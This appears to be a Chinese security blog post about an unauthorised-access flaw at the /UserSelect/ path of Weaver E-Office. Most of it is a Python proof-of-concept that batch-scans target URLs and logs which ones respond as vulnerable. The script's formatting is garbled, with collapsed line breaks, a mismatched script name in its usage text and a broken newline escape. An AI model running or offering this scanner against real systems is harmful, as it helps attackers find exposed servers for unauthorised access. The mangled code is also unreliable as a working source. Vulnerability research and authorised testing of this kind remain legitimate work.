泛微E-Office 未授权访问

http://xx.xx.xx.xx:xx/UserSelect/

 python .unAuthPOC.py -f 文件名

 python .unAuthPOC.py -u 检测目标

# _*_ coding:utf-8 _*_# @Time : 2023/8/3 23:04# @Author: 微信公众号 安全透视镜
import requestsimport argparseimport threading
requests.packages.urllib3.disable_warnings()

def usage():    print('''    +-----------------------------------------------------------------+                微信公众号    网络安全透视镜     使用方法:        单个 python3 e-cology9_sqlcheck.py -u url[例 http://127.0.0.1:8080]        批量 python3 e-cology9_sqlcheck.py -f filename    +-----------------------------------------------------------------+                                         ''')
#proxies = {'http':'http://127.0.0.1:8080'}
def poc(target):    headers = {        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
    }    try:        if 'https' in target:            url = target        elif 'http' in target:            url = target        else:            url = 'http://'+ target        url = url + "/UserSelect/ "        response = requests.get(url,headers=headers,timeout=3)            #print(f"访问 {url} 的响应状态码：{response.status_code}")        if response.status_code == 200:            print(f"{url} 存在未授权访问漏洞")            with open('unAuth_ok.txt',mode='a',encoding='utf-8') as f2:                f2.write(url+'n')
    except Exception as e:        print(f"{url}无法访问")


def run(filepath):
    urls = [x.strip() for x in open(filepath, "r").readlines()]    # 设置线程数量    for u in urls:        poc(u)


def main():    parse = argparse.ArgumentParser()    parse.add_argument("-u", "--url", help="python e-cology9_sqlcheck.py -u url")    parse.add_argument("-f", "--file", help="python e-cology9_sqlcheck.py -f file")    args = parse.parse_args()    url = args.url    filepath = args.file    if url is not None and filepath is None:        poc(url)    elif url is None and filepath is not None:        run(filepath)    else:        usage()

if __name__ == '__main__':    main()